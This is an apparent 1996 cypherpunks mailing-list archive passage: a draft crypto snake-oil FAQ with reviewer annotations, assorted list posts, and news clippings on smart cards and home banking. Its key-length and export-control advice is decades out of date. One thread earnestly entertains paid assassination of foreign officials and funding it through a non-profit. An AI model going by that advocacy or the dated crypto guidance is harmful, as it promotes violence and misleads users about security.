cases.)] >>> I don't understand: "sometimes a product won't be needed?" I think this paragraph could be left out. 
After all, OS utility or Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, right? So you everthing in the FAQ still applies; or maybe I'm missing the point here. ----------------------------- Some basics The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs. Public Key Cryptography ----------------------------- There are two basic types of cryptosystems: symmetric (also known as "conventional," [sometimes also called] >>> or <<< "private key") and asymmetric (public key). Symmetric ciphers require both the sender and the recipient to have the same key. That key is [applied] >>> used by the cryptographic algorithm <<>> originated <<< by the sender, and again by the recipient to decrypt the data. Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses is private key to decrypt the message. Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their symmetric counterparts.] >>> symmetric algorithms, and are almost exclusively used to encrypt short "session keys," which are then used to encrypt a message using the speedier symmetric algorithms. This use of public key cryptography is called "key exchange." ----------------------------- ----------------------------- [Also, key sizes must be much larger.] >>>I agree with one comment that discouraged comparing the 2 algo types.----------------------------- See the cryptography FAQ for a more detailed discussion of [the topic.] 
>>>these topics.<<< Key Sizes ----------------------------- Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds [(making a brute-force attacks feasible).] >>> Again, I maintain that the audience for this stuff can't be relied upon to even know what that means. Try: "which makes the cipher vulnerable to breaking by trying every possible key combination (called a brute-force attack)." --- or something like that. ----------------------------- The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.) Security Requirements for Different Information Type of Traffic Lifetime Minimum [Symmetric] Key Length Tactical military information minutes/hours 56-64 bits Product announcements, mergers, interest rates days/weeks 64 bits Long-term business plans years 64 bits Trade secrets (e.g., recipe for Coca-Cola) decades 112 bits H-bomb secrets >40 years 128 bits Identities of spies >50 years 128 bits Personal affairs >50 years 128 bits Diplomatic embarrassments >65 years at least 128 bits U.S. Census data 100 years at least 128 bits ----------------------------- >>> Where is the attribution for the table?----------------------------- As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition. 
Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks Symmetric Key Length Public-key Key Length 56 bits 384 bits 64 bits 512 bits 80 bits 768 bits 112 bits 1792 bits 128 bits 2304 bits ----------------------------- >>> BEWARE, Danger: comparing public/private key cryptosystems again. I think if you really want to do so, then the comparison should really be explained. ----------------------------- Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a descrption which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the >>> scientific <<< literature, and [many in the field] >>> professionals won't <<< [are unlikely to] trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses to different method of computation doesn't make it more secure. 
----------------------------- >>> As a matter of fact, these techniques are the subject of ongoing cryptographic research and nobody has published successful results based on their use yet. ----------------------------- Anything that claims to have invented a new [public key] cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known to be hard to solve. ----------------------------- >>> There are some other comments in cpunks on this last bit. I defer.----------------------------- The strength of any encryption scheme is only proven by the test of time, >>> involving exhaustive analysis by cryptographers<<<. New crypto is like new pharmaceuticals, not new cars. * Proprietary Algorithms Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the [academic] >>> professional and academic cryptographic <<< community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.) ----------------------------- >>> How can you tell a well-reputed vendor? I am thinging of one co. that promises to release their algo. details upon NDA, but at least in my case the details never showed up! This is slippery here! ----------------------------- Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. 
The use of a trusted algorithm, >>> availability of <<< [if not with] technical notes explaining the implementation ([if not availability of] >>> and preferably <<< the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access you your system, access to encrypted data might be the least of your problems.) ----------------------------- >>> Add: The strength of a cryptosystem should depend ONLY on the security of the keys involved, and not the security of the algorithm. ----------------------------- * Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. ----------------------------- >>> The reader is not qualified to evaluate realistic/unrealistic.----------------------------- No algorithm is unbreakable. 
Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. ----------------------------- >>> Add: Avoid products that use huge numbers to impress you that it would take massive amounts of time to break them. This is ONLY true under the assumption that the only way to break the system is by exhaustively trying every possible key, and this assumption has to be proved before the claim is valid. A cryptosystem using a keylength of 50,000 bits theoretically would take 2 raised to the 50,000th power to break (a ridiculously large number) if, AND ONLY IF the algorithm had no weaknesses. The hard part of cryptosystem design is making an algorithm with no weaknesses, such that exhaustive brute-force search is the only method of breaking it, not using long keys. ----------------------------- * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP. A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient. ----------------------------- >>> Explain what you mean by a "pad" --- using a term which to the newbie may not usually be associated with crypto. Origin being the pads of paper that they used to use etc.etc. ???
----------------------------- ----------------------------- The message is encrypted using [the next n bits in the pad as they key, where n is the number of bits in the message] >>> as many bits from the key as there are bits in the message. That is, for each bit in the message, there is a random bit from the one-time-pad.<<< ----------------------------- After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. The vendor may confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. * Keys and Passwords The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). >>> Other comments addressed this paragraph. I defer. The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. 
Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that sounds too easy to use. ----------------------------- >>> Instead, try: be wary of any product that overly emphasizes ease-of-use without due attention to its cryptographic strength. ----------------------------- Avoid anything that lets anyone with your copy of the software to access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography. * Lost keys and passwords If there's a third-party utility that can crack the software, avoid it. >>> Which - the utility or the crypto? If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key? * Exportable from the USA If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. 
Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary any product that claims it is. Contributors The following folks have contributed to this FAQ. Jeremey Barrett ----------------------------- >>> OK, you can use my RealName:Gregg Weissman <<< ----------------------------- Jim Ray Robert Rothenburg Walking-Owl References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps ---------------------------------------------------------------------------- C Matthew Curtin Last modified: Mon Sep 16 09:51:41 EDT ---------------------------------------------------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. 
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From Adamsc at io-online.com Tue Sep 17 17:25:20 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:25:20 +0800 Subject: 56 kbps modems Message-ID: <19960917192157468.AAA195@IO-ONLINE.COM> On Sun, 15 Sep 1996 01:31:19 -0700, Bill Stewart wrote: >and still get the original 56kbps back out. But if they can, well, >yee-hah, ISDN is nearly dead :-) (Not totally dead; the signalling is >still useful for some applications, the convenience of two channels on >one wire pair is nice, and the fact that people can get 56kbps without Also, can't you add ISDN b-channels ? (I.e. get another 64kps channel) >the phone company's help will pressure them into offering ISDN for >a lower price in areas where the Phone Company's idea of "all the market >will bear" is substantially higher than voice pricing.) ISDN is more elegant; this sounds like a 'kludge' of sorts. OTOH, we've all seen how well a cheap kludge can do, right? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From paul at fatmans.demon.co.uk Tue Sep 17 17:28:14 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Wed, 18 Sep 1996 08:28:14 +0800 Subject: Diffie Hellman - logs in Galois fields Message-ID: <842988785.23058.0@fatmans.demon.co.uk> > I think polluting this mailing list with trivial questions such as this is > just as bad as polluting it with personal attacks. Read the FAQs. 
Get a fucking life, seeing as you haven`t yet posted anything relating remotely to the technical aspects of cryptography to this list I think you need to take a long hard look at what you're saying loser.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From ses at tipper.oit.unc.edu Tue Sep 17 17:33:18 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 18 Sep 1996 08:33:18 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609171255.IAA00172@godzilla.athensnet.com> Message-ID: > So why in the world do those crazy Canadians keep coming here for > BTW, looking at historical costs of medical care and the level of >government involvement, it is safe to say that the US has too much >socialism in our medical system right now, and that is what's making the >best system (ours) so expensive when it would not be otherwise.
I wouldn't be so proud of the US health care system; the actual quality of care is really pretty awful, even with insurance. Even though the National Health Service in the UK is woefully underfunded, I've always had much better treatment than I have from HMOs here; even seeing a specialist privately, at home, with no insurance, is cheaper than getting an X-Ray looked at by someone who once met a radiologist at a cocktail party. The UK split the provision of services from the purchasing, so that hospitals have to compete for business, and an HMO-like funding model for primary care physicians (fixed capitation rates, so the more a doctor spends, the less money he/she makes). It may be that the most efficient solution for health-care is a hybrid scheme along these lines. There are ideological reasons that argue for rejecting such compulsory schemes based on that element of coercion; it's hard to make the case against purely on efficiency grounds. Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From azur at netcom.com Tue Sep 17 17:36:24 1996 From: azur at netcom.com (Steve Schear) Date: Wed, 18 Sep 1996 08:36:24 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: >On Mon, 16 Sep 1996, Steve Schear wrote: > >> Someone wrote: > >> >The problem is that assassination rarely leads to the installation of >> >a government that is any better. In most cases it gets worse. > >[...] > >> We've all heard these arguments, but are they true? Who says so, and how >> can they be certain? Jim's suggestion has never, to my knowledge, been >> tried on a consistent, large, scale. When all conventional alternatives >> have been tried and fail, what have we or the starving children got to >> lose? > >I think "Lord of the Flies" answers this question quite well. Does it?
LOTF was fiction. Can you identify a recent instance in which a non-governmental organization attempted to influence political/military events via a concerted AP? > >> Is it legal for citizens of the U.S. to engage in contract killing of >> foreign military, politations, etc? How about U.S. or foreign non-profits? > >As to the first, yes. (There are several anti-mercenary statutes on the >books) As to the second, I don't understand the question. > So, you're saying it is legal for citizens? The second question was whether a non-profit org. could raise tax-deductible funds to conduct such operations. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From Adamsc at io-online.com Tue Sep 17 17:44:16 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:44:16 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: <19960917191852828.AAA142@IO-ONLINE.COM> On Sat, 14 Sep 1996 23:58 EDT, E. Allen Smith wrote: >fetters to win. (In the ultimate extreme, I include gun control under the >fetters that communism/etcetera need to win... the "redistribution" from >producers ("rich") to welfare drones ("poor") during the Rodney King riots >would have been nicely prevented by some shopkeepers with automatic weapons. As I recall this actually happened in a couple cases, didn't it? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." 
-- Duncan Frissell From fletch at ain.bls.com Tue Sep 17 17:53:00 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Wed, 18 Sep 1996 08:53:00 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] In-Reply-To: <19960917173431968.AAA223@IO-ONLINE.COM> Message-ID: <9609172114.AA26321@outland> >>Gee, biotech has come a long way. Now I can download the Anthrax DNA >>sequence from the net and insert it in some carrier bacteria and start >>making Anthrax bacteria. Neat! > Now the bad news: the DNA replicator only works under Windows 95 and comes > with buggy drivers! Buggy drivers? But isn't that the point in this case? :) > Unfortunately, it can be very deadly. The idea here is that it rarely infects > humans - in the normal course of events. If a determined biowarrior is trying > to infect people, all bets are off. The Frank Herbert (of _Dune_ fame) book _White Plague_ comes to mind. Basically a molecular biologist's wife and kids are killed by an IRA bomb while visiting Dublin. He snaps and creates a plague which kills women (men are carriers) as revenge. All without using that nasty Internet (in fact, the book was written back before even ARPAnet). --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From Adamsc at io-online.com Tue Sep 17 17:58:45 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 18 Sep 1996 08:58:45 +0800 Subject: Uses of Computational Chaos Message-ID: <19960917191720703.AAA221@IO-ONLINE.COM> On Sat, 14 Sep 1996 23:37 EDT, E. Allen Smith wrote: > It is reasonably obvious that using _computational_ (as opposed to >physical) chaos won't increase entropy. But how about using it to make an >attacker work harder to use any flaws in your method of generating random >bits?
As a simplistic example, say that the scribble window you're using tends >to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit. Supposing, too, that you know these weaknesses, would using separate algorithms for different portions of the number work well? # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From dlv at bwalk.dm.com Tue Sep 17 18:20:11 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 09:20:11 +0800 Subject: [NEWS] Some crypto-relevant wire clippings for a change Message-ID: WITH INTUIT ACQUISITION, CHECKFREE WILL SERVICE ONE MILLION CheckFree Corporation announced an agreement to acquire Intuit Services Corporation (ISC) for 12.6 million shares of common stock in CheckFree Corporation. Intuit Services Corporation is a wholly owned subsidiary of Intuit Inc. Based on the September 13 closing price of 18 1/16 for CheckFree stock, the indicated price CheckFree is paying for ISC is $227 million. After completion of the acquisition, CheckFree will provide home banking and bill payment services to over 180 financial institutions. The acquisition will bring CheckFree's base of home banking and bill payment users to over one million. CheckFree Corporation markets its electronic commerce processing capabilities exclusively to financial institutions, which, in turn, use them to provide home banking and bill payment services to their customers. CheckFree's approach is behind the scenes: providing banking and bill payment transaction processing. -- PR Newswire, 9/16/96 French Bank Note Printer Buying U.S.
Card Maker By VALERIE BLOCK Francois-Charles Oberthur Group of France, the third-largest bank note printer in the world, has agreed to purchase Kirk Plastic Co., the second- largest card manufacturer in the United States. The deal, announced last week, follows the sale of other North American plastic card producers to European companies over the last two years. Gemplus bought a U.S. manufacturing base from DataCard Corp., and competitor Schlumberger acquired Malco Plastics. Giesecke & Devrient of Germany bought Security Card Systems of Canada, and De La Rue of Great Britain bought McCorquodale. Los Angeles-based Kirk Plastic had announced a joint venture with Orga Card Systems Inc., a German smart card company, in July 1995, but those negotiations were terminated several months ago. Kirk R. Hyde, president of Kirk Plastic, a 77-year-old family-owned business, said Oberthur made a better partner. Mr. Hyde, 53, will sign a three-year employment contract with Oberthur, also a family business, which is 70%-owned by Jean-Pierre Savare. Kirk Plastic will keep its name and 2,500 employees. Mr. Hyde said he'd had reservations about selling his company, but "if we don't make the deal, we could be out of business in five years if smart cards take over." He said his competitors were purchased by large European concerns driven by smart cards and technological changes. "I could no longer keep up with investments to remain competitive," he added. The new owner will infuse capital and technology, and add distribution channels. Mr. Hyde would not disclose specific terms of the deal, which is scheduled to close within 30 days. Industry observers see the European invasion as concrete evidence that smart cards are gaining ground in the United States. "It's another indication that many companies are betting millions that the U.S. 
market will develop very quickly," said Dan Cunningham, senior vice president of business development at Phoenix Planning and Evaluation Ltd., a Rockville, Md.-based consulting firm. Mr. Cunningham headed Gemplus' U.S. subsidiary before it acquired the DataCard manufacturing facilities. In Atlanta, Visa is testing Visa Cash, the stored-value smart card system launched in conjunction with the Olympic Games. By early next year, Visa will join with MasterCard, Citibank, and Chase Manhattan Bank in a potentially crucial "interoperability" test on Manhattan's Upper West Side. In other signs of U.S. progress in the smart card industry: Wells Fargo and Co. and AT&T Universal Card Services became owners of Mondex International, the company formed by National Westminster Group of London; several universities are implementing smart card systems on campuses in conjunction with banks; and U S West rolled out card-reading phones in several western states. Even so, smart cards are not producing income here. Mr. Cunningham said acquisitions of profitable companies like Kirk can generate funding for early smart card development. Kirk Plastic, with annual revenues of more than $25 million, said it will produce 125 million magnetic stripe cards this year. Oberthur, an international producer of lottery tickets and plastic cards in addition to bank notes, participates in a joint venture, CP8 Oberthur, which is one-third owned by Bull Group of France, another top smart card producer with U.S. facilities. CP8 Oberthur produces 50 million smart cards annually in two French factories, supplying nearly 70% of French bank cards. Oberthur's U.S. subsidiary, Banknote Corporation of America, is the second-largest security printer in the United States. 
ComputerWorld: August 26, 1996 Opening Soon: Microsoft National Bank If Bill Gates can persuade the Justice Department to go easy on Microsoft's monopoly in PC operating systems, just imagine how easily he could persuade regulatory agencies to grant him a bank charter. Give up a few tons of documents, hold several meetings that consist of silly bureaucratic bantering and voila! he's got an $ 18 billion de novo bank with millions of online "branches" overnight. And not a trowel of mortar needed. Why speculate about the notion of a Microsoft bank? Because Gates is an impatient man. He doesn't believe bankers are moving fast enough to make home banking a success. The entrepreneurial instinct of such a highly successful person suggests that if conventional approaches don't work, he will bypass them and take over. Gates is a helluva marketer and promoter; he could sell the concept with pizzazz. There's also a bit more to this proposition than meets the eye. A recent phone call from Microsoft's lead person in the home-banking fray revealed some interesting insights. First, the only reason this well-informed and well-connected gentleman called me is that he knows how I feel about home banking -- it's a solution searching for a problem. I think he's trying to swing me (and at least one other highly visible skeptic) over to his camp. Second, the executive said, home banking has to be sold aggressively by banks. He figures consumers aren't likely to rush in and sign up. He's absolutely correct about the absence of a rush. The part about having to sell online banking aggressively to consumers worries me. If that's the case, then home banking is a cat that has already used up eight lives in the past 25 years. Every major bank has tried home banking and has failed. If the last chance depends on the typical banker's sales skills, then home banking is dead for sure. Consumers are smarter than ever. Give them good reasons to switch, and they don't have to be pushed.
Home banking doesn't yet provide compelling reasons. Today's consumers are in love with the checkbook. They aren't complaining about checks. (Banks, of course, hate checks because they're expensive to process.) Consumers don't want to expose their spending habits on the Internet, either. They just aren't ready to say, "I think I'll jump on the Internet today and pay my bills." The promoters of home banking point to surveys that show the increasing penetration of PCs in U.S. households. But that doesn't mean those PCs will be used for online banking. If a poll said 80% of U.S. homeowners have a back yard, does it mean they all want to plant tomatoes? Even banking's technocrats don't do online banking when they go home. If compelling reasons to bank from home are missing, then the next best chance for success will depend on a cultural shift. Maybe the future yuppies, who are now in grade school, will embrace home banking just because it fits in to their electronic lifestyles. The "Gomwatms" -- grumpy old men with all the money -- will eventually fade out of the picture. Home banking is a sure thing, once we find its right decade. By M. Arthur Gillis; Gillis is president of Computer Based Solutions, Inc., a banking technology consultancy in Dallas. His Internet address is artgillis at aol.com Financial Times: Thursday, August 29, 1996 Online Shopping Plan Claims Better Security Uunet Pipex on the Internet not only met widespread concerns about security but was more secure than buying by phone or in a shop with a credit or debit card. The company, the UK subsidiary of MFS, the US telecoms operator bought earlier this week by WorldCom of the US and one of the largest European Internet service providers, believes its system is in advance of US developments. The British system is backed by National Westminster Bank, which will act as the clearing house for online debits and credit card transactions.
Uunet Pipex said the system, called "The Bureau", will enable customers to buy goods from electronic "shops" on the Internet in safety and with security. Merchants trading on the Internet will be able to take advantage of an established payments mechanism without the cost of building their own. Shopping over the Internet has been possible for some time but its popularity has been held back by concerns over security. Potential customers are reluctant to trust the Net with their credit card information. Nevertheless, online electronic commerce is believed to be worth $300m (GBP193m) annually at present and rising. Among the organisations seeking to develop secure shopping and payments systems are card companies Visa, Mastercard and American Express and software developers Microsoft, Netscape Communications and Verifone. Internet merchants sign up with Uunet Pipex and pay 5 per cent of the purchase value per transaction. The system is activated when a customer presses the "buy" key and enters his or her credit information. It is then stored securely by Uunet who instructs NatWest to pay the merchant for the purchase. When the deal is complete electronic confirmations are generated for customer and merchant. Mr Richard Nuttall, Uunet Pipex director of electronic commerce, said: "Until now, security concerns have deterred buyers and sellers from doing business over the Net. We have created a comparatively low cost system that is more secure than buying goods on an ordinary credit or debit card." Four merchants have already signed up to use the system. Responsibility for establishing an electronic shop on the Net remains with the merchant. Many believe the quality of the images of goods for sale is a more effective deterrent to Internet commerce than fears over payment security. The principal advantage of "The Bureau" over competitive systems seems to be the ease and low cost of adoption.
Mr Susen Sarkar of the London technology consultancy, Ovum, said: "The launch of The Bureau will remove anxieties for both merchants and consumers." Other UK groups, notably Barclays Bank, already offer Internet shopping services and British Telecommunications is testing a large-scale online shopping service. American Banker: Thursday, August 29, 1996 On-Line Banks Unsure About What Kind of Web to Weave JENNIFER KINGSON BLOOM Most banks want to do more with their Web sites, but aren't exactly sure what, according to a survey of banks that have presences on the Internet. Netmarquee Online Services Inc., a Needham, Mass., company that offers on-line information for family businesses, conducted the survey this month. Of 150 banks in the survey, 65% wanted to enhance their content so that people would visit the Web sites more often. "A good number of these banks put Web sites up nine months or a year ago, and they're saying, 'Now what?'," said David Gumpert, president of Netmarquee. "They're coming to realize that they need to do something more than an electronic brochure, to provide some kind of value added to their prospects and customers besides just saying, 'Aren't we great?'" Mr. Gumpert's survey, conducted by telephone, found that traffic ranged from 100 to 500 visits a month. Only 5% of banks surveyed said they were actively promoting or advertising their Web sites. The survey also found that the larger the bank, the more interested it was in using the Internet for business purposes. Banks now are devising a variety of ways to draw repeat traffic to their sites, including trivia quizzes and mortgage calculators. Mr. Gumpert's company sells packages of information relevant to small businesses, and he is trying to coax banks to subscribe to his information service, which provides monthly updates. One bank that is considering a subscription to Netmarquee's product is Bank of Boston Corp. 
Ray Graber, marketing manager for the Web site, said the bank is looking at ways to provide interactive features, like on-line account applications or account transfer capabilities. Mr. Graber said the bank is also considering a service called "Rentnet" that lists apartment rentals on the Internet and might prove helpful to the many college students in the Boston area. Financial Post (Canada): Tuesday, August 27, 1996 Smart Cards Don't Have All the Answers-- Yet By MOTOKO RICH and GEORGE GRAHAM In Mission Impossible, Tom Cruise's latest film, the fearless Ethan Hunt breaks into the CIA computer room, disarming a technological stronghold by punching in numerical codes and submitting his eyes for a retina scan. While most viewers see such high-tech wizardry as fantastic, some of the gadgets may not be far from reality. Researchers worldwide are experimenting with technology that would allow not only security barriers but also electronic payment systems to use the retina, the handprint or even a facial expression as an identification method. "We are moving into the electronic age where money will just be information about the wealth you have," says Hans van der Velde, president of the European Union region of Visa International. Some companies believe that parts of the body, rather than paper or coins, can be used to establish the amount of money somebody has available to spend. For the time being, however, most participants in the payment industry believe the best alternative to cash remains the humble, but universal, plastic card. An increasing number of payment card organizations are replacing the magnetic strip -- the present industry standard -- with a tiny computer microchip that enables cards to be used not only to carry out financial transactions, but also to store data about the card's owner. 
A chip-based card is much more difficult to counterfeit than the magnetic stripe card and can carry details of a cardholder's insurance policies, medical history or driver's licence. It can be used to manage a retailer's loyalty program and even be used as a key for house or car. Above all, as a plethora of experiments demonstrates, it can be used as an "electronic wallet" storing value instead of petty cash. Pilot programs from the U.S. to Australia are testing the capabilities of these cards. In Britain, the most advanced trial is being conducted by Mondex, originally backed by National Westminster Bank and Midland Bank, and now owned by 17 banks. During the past year, Mondex has invited customers to use the cards in Swindon, where they can pay for small items like newspapers or chocolate bars without coins or notes. The cards are loaded up with value debited from the customer's bank account at automated teller machines or on "smart" telephones. Retailers can then take funds off the card without having to authorize each transaction online. While Mondex is in a race with other global payment organizations to develop and market its version of the electronic wallet on a global basis, several regional projects are harnessing the smart-card technology for a number of payment applications. Transcard, operated in western Sydney by Card Technologies Australia, combines an electronic bus pass with a re-loadable cash card that clocks up loyalty bonus points for buying McDonald's hamburgers or entry to the local swimming pool. In France, customers can pay for taxi rides, newspapers and phone calls with virtually ubiquitous smart cards. Sponsors of these projects are enthusiastic about the early results. "The technology works. That's probably more of a shock to people than anything else," says Beth Horowitz, MasterCard's vice-president for chip card business in Australia. Live testing has resolved some questions. 
Almost everyone now agrees that the electronic wallet must be reloadable, not a disposable fixed-value card that has been used for telephone cards or in Visa's Atlanta pilot. But for those who wish to exploit the global market -- worth an estimated US$ 4.3 trillion -- for card payments, there are some issues that remain unresolved. One is standards, an issue that plagues all new technological innovations, from the Internet to videocassette tapes. Although Europay, MasterCard and Visa, the largest global retail payments organizations, have developed international standards for chip cards, some systems -- notably Mondex -- do not comply. "The issue of standards has complicated the market for 15 years," says Gerald Hawkins, manager of card services at Lloyd's TSB in Britain. "It is one of the reasons why Mondex, while clearly a very advanced development, has taken a bit of a knock." The idea of a standard is that it would guarantee interoperability among systems, because retailers will want multiple terminals to accept different cards. Mondex argues that the market, rather than standards, will determine which cards will operate in point-of-sale terminals. It says that a number of these terminal suppliers have already demonstrated that interoperable equipment can be made to accept Mondex and all other magnetic stripe and chip cards. In fact, the EMV standards themselves have been criticized because they stick to "contact" technology, in which the chip must come into physical contact with a reader inside a slot. For high-volume applications in places such as railways or buses, contactless technology, in which a card contains 